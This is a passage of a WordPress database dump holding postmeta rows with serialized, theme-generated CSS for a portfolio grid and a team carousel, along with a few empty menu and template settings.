.entry-title,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.owl-carousel .entry-title {\n  margin-bottom: 5px;\n  font-size: 22px;\n  line-height: 32px;\n  font-weight: bold;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-meta {\n  margin-bottom: 15px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .portfolio-categories {\n  margin-bottom: 15px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-excerpt {\n  margin-bottom: 5px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.centered-layout-list) .post-entry-content {\n  padding: 20px 30px 30px 30px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.centered-layout-list):not(.content-bg-on):not(.mode-list) .no-img .post-entry-content {\n  padding: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.content-bg-on:not(.classic-layout-list):not(.centered-layout-list):not(.gradient-overlay-layout-list) .post-entry-content {\n  background: #f7f7f7;\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.gradient-overlay-layout-list .post-entry-content {\n  border-radius: 0px;\n}\n@media screen and (max-width: ) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 article {\n    -webkit-flex-flow: column nowrap;\n    -moz-flex-flow: column nowrap;\n    -ms-flex-flow: column nowrap;\n    flex-flow: column nowrap;\n    margin-top: 20px;\n  }\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on article {\n    border: none;\n  }\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.content-bg-on.centered-layout-list article {\n    padding: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap,\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-entry-content {\n    width: 100%;\n    margin: 0;\n    top: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap {\n    padding: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-entry-content:after {\n    display: none;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-even .post-thumbnail-wrap,\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.centered-layout-list .post-thumbnail-wrap {\n    -webkit-order: 0;\n    -moz-order: 0;\n    -ms-flex-order: 0;\n    order: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.centered-layout-list .post-entry-title-content {\n    -webkit-order: 1;\n    -moz-order: 1;\n    -ms-flex-order: 1;\n    order: 1;\n    width: 100%;\n    padding: 20px 20px 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.centered-layout-list .post-entry-content {\n    -webkit-order: 2;\n    -moz-order: 2;\n    -ms-flex-order: 2;\n    order: 2;\n    padding-top: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-entry-content {\n    padding: 20px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-title {\n    margin: 3px 0 5px;\n    font-size: 20px;\n    line-height: 26px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-meta {\n    margin: 5px 0 5px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-excerpt {\n    margin: 15px 0 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-details {\n    margin: 5px 0 10px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-details.details-type-link {\n    margin-bottom: 2px;\n  }\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid {\n  grid-row-gap: 30px;\n  grid-column-gap: 30px;\n  grid-template-columns: repeat(auto-fill,minmax(,1fr));\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid .double-width {\n  grid-column: span 2;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid {\n  display: flex;\n  flex-flow: row wrap;\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid .wf-cell {\n  flex: 1 0 ;\n  max-width: 100%;\n  padding: 15px;\n  box-sizing: border-box;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n  grid-template-columns: repeat(3,1fr);\n  grid-template-rows: auto;\n  grid-column-gap: 30px;\n  grid-row-gap: 30px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .double-width {\n  grid-column: span 2;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n  width: 33.333333333333%;\n  padding: 15px;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n  width: calc(33.333333333333%) * 2;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width:not(.centered-layout-list):not(.content-bg-on) .dt-css-grid {\n  grid-row-gap: 0px;\n}\n@media screen and (max-width: 1199px) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(3,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 33.333333333333%;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n    width: calc(33.333333333333%)*2;\n  }\n}\n@media screen and (max-width: 991px) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(2,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 50%;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n    width: calc(50%)*2;\n  }\n}\n@media screen and (max-width: 767px) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(1,1fr);\n  }\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .double-width {\n    grid-column: span 1;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 100%;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n    width: calc(100%)*2;\n  }\n}\n\";}'),
(9570,2577,'_wp_page_template','default'),
(9572,2577,'_dt_microsite_primary_menu',''),
(9573,2577,'_dt_microsite_split_left_menu',''),
(9574,2577,'_dt_microsite_split_right_menu',''),
(9575,2577,'_dt_microsite_mobile_menu',''),
(9576,2574,'the7_shortcodes_dynamic_css','a:2:{s:32:\"201f9108f8c091b6e53bc27c2796c9d8\";s:6921:\".team-carousel-shortcode.team-carousel-shortcode-id-201f9108f8c091b6e53bc27c2796c9d8.owl-carousel .owl-nav a {\n  width: 36px;\n  height: 36px;\n  border-radius: 500px;\n}\n.team-carousel-shortcode.team-carousel-shortcode-id-201f9108f8c091b6e53bc27c2796c9d8.owl-carousel .owl-nav a:before,\n.team-carousel-shortcode.team-carousel-shortcode-id-201f9108f8c091b6e53bc27c2796c9d8.owl-carousel .owl-nav a:after {\n  border-width: 0px;\n}\n.team-carousel-shortcode.team-carousel-shortcode-id-201f9108f8c091b6e53bc27c2796c9d8.owl-carousel .owl-nav a.owl-prev {\n  top: 50%;\n  transform: translateY(calc(-50% + 0px));\n  left: -43px;\n}\n@media all and (-ms-high-contrast: none) {\n  .team-carousel-shortcode.team-carousel-shortcode-id-201f9108f8c091b6e53bc27c2796c9d8.owl-carousel .owl-nav a.owl-prev {\n    transform: translateY(-50%);\n    margin-top: 0px;\n  }\n}\n.team-carousel-shortcode.team-carousel-shortcode-id-201f9108f8c091b6e53bc27c2796c9d8.owl-carousel .owl-nav a.owl-prev i {\n  padding: 0px 0px 0px 0px;\n}\n.team-carousel-shortcode.team-carousel-shortcode-id-201f9108f8c091b6e53bc27c2796c9d8.owl-carousel .owl-nav a.owl-next {\n  top: 50%;\n  transform: translateY(calc(-50% + 0px));\n  right: -43px;\n}\n@media all and (-ms-high-contrast: none) {\n  .team-carousel-shortcode.team-carousel-shortcode-id-201f9108f8c091b6e53bc27c2796c9d8.owl-carousel .owl-nav a.owl-next {\n    transform: translateY(-50%);\n    margin-top: 0px;\n  }\n}\n.team-carousel-shortcode.team-carousel-shortcode-id-201f9108f8c091b6e53bc27c2796c9d8.owl-carousel .owl-nav a.owl-next i {\n  padding: 0px 0px 0px 0px;\n}\n.team-carousel-shortcode.team-carousel-shortcode-id-201f9108f8c091b6e53bc27c2796c9d8.owl-carousel .owl-nav i {\n  font-size: 18px;\n}\n.team-carousel-shortcode.team-carousel-shortcode-id-201f9108f8c091b6e53bc27c2796c9d8.owl-carousel .owl-nav a:not(:hover) i,\n.team-carousel-shortcode.team-carousel-shortcode-id-201f9108f8c091b6e53bc27c2796c9d8.owl-carousel .owl-nav a:not(:hover) i:before {\n  color: #ffffff;\n  background: none;\n}\n.team-carousel-shortcode.team-carousel-shortcode-id-201f9108f8c091b6e53bc27c2796c9d8.owl-carousel .owl-nav a:hover i,\n.team-carousel-shortcode.team-carousel-shortcode-id-201f9108f8c091b6e53bc27c2796c9d8.owl-carousel .owl-nav a:hover i:before {\n  color: rgba(255,255,255,0.75);\n  background: none;\n}\n.team-carousel-shortcode.team-carousel-shortcode-id-201f9108f8c091b6e53bc27c2796c9d8 .owl-dots {\n  top: calc(100% + 20px);\n  left: 50%;\n  transform: translateX(calc(-50% + 0px));\n}\n@media all and (-ms-high-contrast: none) {\n  .team-carousel-shortcode.team-carousel-shortcode-id-201f9108f8c091b6e53bc27c2796c9d8 .owl-dots {\n    transform: translateX(-50%);\n    margin-left: 0px;\n  }\n}\n.team-carousel-shortcode.team-carousel-shortcode-id-201f9108f8c091b6e53bc27c2796c9d8 .owl-dot {\n  width: 10px;\n  height: 10px;\n  margin: 0 8px;\n}\n@media screen and (max-width: 778px) {\n  .team-carousel-shortcode.team-carousel-shortcode-id-201f9108f8c091b6e53bc27c2796c9d8.hide-arrows.owl-carousel .owl-nav a {\n    display: none;\n  }\n}\n@media screen and (max-width: 778px) {\n  .team-carousel-shortcode.team-carousel-shortcode-id-201f9108f8c091b6e53bc27c2796c9d8.reposition-arrows.owl-carousel .owl-nav .owl-prev {\n    top: 50%;\n    transform: translateY(calc(-50% + 0px));\n    left: 10px;\n  }\n  .team-carousel-shortcode.team-carousel-shortcode-id-201f9108f8c091b6e53bc27c2796c9d8.reposition-arrows.owl-carousel .owl-nav .owl-next {\n    top: 50%;\n    transform: translateY(calc(-50% + 0px));\n    right: 10px;\n  }\n}\n@media screen and (max-width: 778px) and all and (-ms-high-contrast: none) {\n  .team-carousel-shortcode.team-carousel-shortcode-id-201f9108f8c091b6e53bc27c2796c9d8.reposition-arrows.owl-carousel .owl-nav .owl-prev {\n    transform: translateY(-50%);\n    margin-top: 0px;\n  }\n}\n@media screen and (max-width: 778px) and all and (-ms-high-contrast: none) {\n  .team-carousel-shortcode.team-carousel-shortcode-id-201f9108f8c091b6e53bc27c2796c9d8.reposition-arrows.owl-carousel .owl-nav .owl-next {\n    transform: translateY(-50%);\n    margin-top: 0px;\n  }\n}\n.team-carousel-shortcode.team-carousel-shortcode-id-201f9108f8c091b6e53bc27c2796c9d8 .team-desc {\n  padding: 20px 20px 20px 20px;\n}\n.team-carousel-shortcode.team-carousel-shortcode-id-201f9108f8c091b6e53bc27c2796c9d8 .team-author-name,\n.team-carousel-shortcode.team-carousel-shortcode-id-201f9108f8c091b6e53bc27c2796c9d8 .team-author-name a {\n  margin-bottom: 0px;\n  font-weight: bold;\n}\n.team-carousel-shortcode.team-carousel-shortcode-id-201f9108f8c091b6e53bc27c2796c9d8 .team-author p {\n  margin-bottom: 10px;\n  font-weight: bold;\n}\n.team-carousel-shortcode.team-carousel-shortcode-id-201f9108f8c091b6e53bc27c2796c9d8  .team-media {\n  padding: 0px 0px 0px 0px;\n}\n.team-carousel-shortcode.team-carousel-shortcode-id-201f9108f8c091b6e53bc27c2796c9d8 .team-content {\n  margin-bottom: 5px;\n}\n.team-carousel-shortcode.team-carousel-shortcode-id-201f9108f8c091b6e53bc27c2796c9d8  .team-media,\n.team-carousel-shortcode.team-carousel-shortcode-id-201f9108f8c091b6e53bc27c2796c9d8  .team-media a.rollover,\n.team-carousel-shortcode.team-carousel-shortcode-id-201f9108f8c091b6e53bc27c2796c9d8  .team-media a.rollover *,\n.team-carousel-shortcode.team-carousel-shortcode-id-201f9108f8c091b6e53bc27c2796c9d8  .team-media img {\n  border-radius: 0px;\n}\n.team-carousel-shortcode.team-carousel-shortcode-id-201f9108f8c091b6e53bc27c2796c9d8 .soc-ico {\n  margin-bottom: 15px;\n}\n.team-carousel-shortcode.team-carousel-shortcode-id-201f9108f8c091b6e53bc27c2796c9d8 .soc-ico a {\n  min-width: 26px;\n  min-height: 26px;\n  font-size: 16px;\n  border-radius: 100px;\n}\n.team-carousel-shortcode.team-carousel-shortcode-id-201f9108f8c091b6e53bc27c2796c9d8 .soc-ico a:not(:last-child) {\n  margin-right: 4px;\n}\n.team-carousel-shortcode.team-carousel-shortcode-id-201f9108f8c091b6e53bc27c2796c9d8 .soc-ico a:before,\n.team-carousel-shortcode.team-carousel-shortcode-id-201f9108f8c091b6e53bc27c2796c9d8 .soc-ico a:after {\n  min-width: 26px;\n  min-height: 26px;\n  padding: inherit;\n}\n.dt-icon-border-on.team-carousel-shortcode.team-carousel-shortcode-id-201f9108f8c091b6e53bc27c2796c9d8 .soc-ico a:before {\n  border: 0px solid transparent;\n}\n.team-carousel-shortcode.team-carousel-shortcode-id-201f9108f8c091b6e53bc27c2796c9d8 .soc-ico a:hover {\n  font-size: 16px;\n}\n#page .team-carousel-shortcode.team-carousel-shortcode-id-201f9108f8c091b6e53bc27c2796c9d8 .soc-ico a:hover .soc-font-icon {\n  color: rgba(255,255,255,0.75);\n  background: none;\n}\n.dt-icon-border-hover-on.team-carousel-shortcode.team-carousel-shortcode-id-201f9108f8c091b6e53bc27c2796c9d8 .soc-ico a:after {\n  border: 0px solid transparent;\n}\n#page .team-carousel-shortcode.team-carousel-shortcode-id-201f9108f8c091b6e53bc27c2796c9d8 .soc-ico a:not(:hover) .soc-font-icon {\n  color: #ffffff;\n  background: none;\n}\n.team-carousel-shortcode.team-carousel-shortcode-id-201f9108f8c091b6e53bc27c2796c9d8 .soc-ico a .soc-font-icon {\n  font-size: 16px;\n}\n\";s:32:\"d4f3d29c475ebf97cf26d99ef9e65ce5\";s:12869:\".portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.content-bg-on.classic-layout-list article {\n  background: #f7f7f7;\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on.classic-layout-list article {\n  padding-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on.classic-layout-list article:first-of-type {\n  margin-top: 0;\n  padding-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.classic-layout-list.mode-list .post-entry-content {\n  width: calc(100% - );\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.classic-layout-list.mode-list .no-img .post-entry-content {\n  width: 100%;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .filter-bg-decoration .filter-categories a.act {\n  color: #fff;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.mode-masonry) article:first-of-type,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.mode-masonry) article.visible.first {\n  margin-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on:not(.mode-masonry) article {\n  margin-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on:not(.mode-masonry) article:first-of-type,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on:not(.mode-masonry) article.visible.first {\n  margin-top: 0;\n  padding-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.hover-scale article:after {\n  background: -webkit-linear-gradient();\n  background: linear-gradient();\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.gradient-overlay-layout-list article {\n  border-radius: 0px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap {\n  padding: 20px 20px 0px 20px;\n  border-radius: 0px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap *,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-rollover:after {\n  border-radius: 0px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.enable-bg-rollover .post-thumbnail-rollover:after {\n  background: -webkit-linear-gradient();\n  background: linear-gradient();\n}\n.bottom-overlap-layout-list.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container {\n  height: calc(100% - 100px);\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a {\n  width: 44px;\n  height: 44px;\n  line-height: 44px;\n  border-radius: 100px;\n  margin: 10px 5px 10px;\n}\n.content-rollover-layout-list:not(.content-align-center).portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a,\n.gradient-overlay-layout-list:not(.content-align-center).portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a {\n  margin: 10px 10px 10px 0;\n}\n.dt-icon-border-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:before {\n  border-width: 0px;\n  border-style: solid;\n}\n.dt-icon-hover-border-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:after {\n  border-width: 0px;\n  border-style: solid;\n}\n.dt-icon-bg-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:before {\n  background: rgba(255,255,255,0.3);\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.dt-icon-hover-bg-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:after {\n  background: rgba(255,255,255,0.5);\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a > span:before {\n  font-size: 16px;\n  line-height: 44px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:not(:hover) > span {\n  color: #ffffff;\n}\n.dt-icon-hover-off.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a > span,\n.dt-icon-hover-off.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:hover > span {\n  color: #ffffff;\n}\n.dt-icon-hover-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:hover > span {\n  color: #ffffff;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-title,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.owl-carousel .entry-title {\n  margin-bottom: 5px;\n  font-size: 22px;\n  line-height: 32px;\n  font-weight: bold;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-meta {\n  margin-bottom: 15px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .portfolio-categories {\n  margin-bottom: 15px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-excerpt {\n  margin-bottom: 5px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.centered-layout-list) .post-entry-content {\n  padding: 20px 30px 30px 30px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.centered-layout-list):not(.content-bg-on):not(.mode-list) .no-img .post-entry-content {\n  padding: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.content-bg-on:not(.classic-layout-list):not(.centered-layout-list):not(.gradient-overlay-layout-list) .post-entry-content {\n  background: #f7f7f7;\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.gradient-overlay-layout-list .post-entry-content {\n  border-radius: 0px;\n}\n@media screen and (max-width: ) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 article {\n    -webkit-flex-flow: column nowrap;\n    -moz-flex-flow: column nowrap;\n    -ms-flex-flow: column nowrap;\n    flex-flow: column nowrap;\n    margin-top: 20px;\n  }\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on article {\n    border: none;\n  }\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.content-bg-on.centered-layout-list article {\n    padding: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap,\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-entry-content {\n    width: 100%;\n    margin: 0;\n    top: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap {\n    padding: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-entry-content:after {\n    display: none;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-even .post-thumbnail-wrap,\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.centered-layout-list .post-thumbnail-wrap {\n    -webkit-order: 0;\n    -moz-order: 0;\n    -ms-flex-order: 0;\n    order: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.centered-layout-list .post-entry-title-content {\n    -webkit-order: 1;\n    -moz-order: 1;\n    -ms-flex-order: 1;\n    order: 1;\n    width: 100%;\n    padding: 20px 20px 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.centered-layout-list .post-entry-content {\n    -webkit-order: 2;\n    -moz-order: 2;\n    -ms-flex-order: 2;\n    order: 2;\n    padding-top: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-entry-content {\n    padding: 20px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-title {\n    margin: 3px 0 5px;\n    font-size: 20px;\n    line-height: 26px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-meta {\n    margin: 5px 0 5px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-excerpt {\n    margin: 15px 0 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-details {\n    margin: 5px 0 10px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-details.details-type-link {\n    margin-bottom: 2px;\n  }\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid {\n  grid-row-gap: 30px;\n  grid-column-gap: 30px;\n  grid-template-columns: repeat(auto-fill,minmax(,1fr));\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid .double-width {\n  grid-column: span 2;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid {\n  display: flex;\n  flex-flow: row wrap;\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid .wf-cell {\n  flex: 1 0 ;\n  max-width: 100%;\n  padding: 15px;\n  box-sizing: border-box;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n  grid-template-columns: repeat(3,1fr);\n  grid-template-rows: auto;\n  grid-column-gap: 30px;\n  grid-row-gap: 30px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .double-width {\n  grid-column: span 2;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n  width: 33.333333333333%;\n  padding: 15px;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n  width: calc(33.333333333333%) * 2;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width:not(.centered-layout-list):not(.content-bg-on) .dt-css-grid {\n  grid-row-gap: 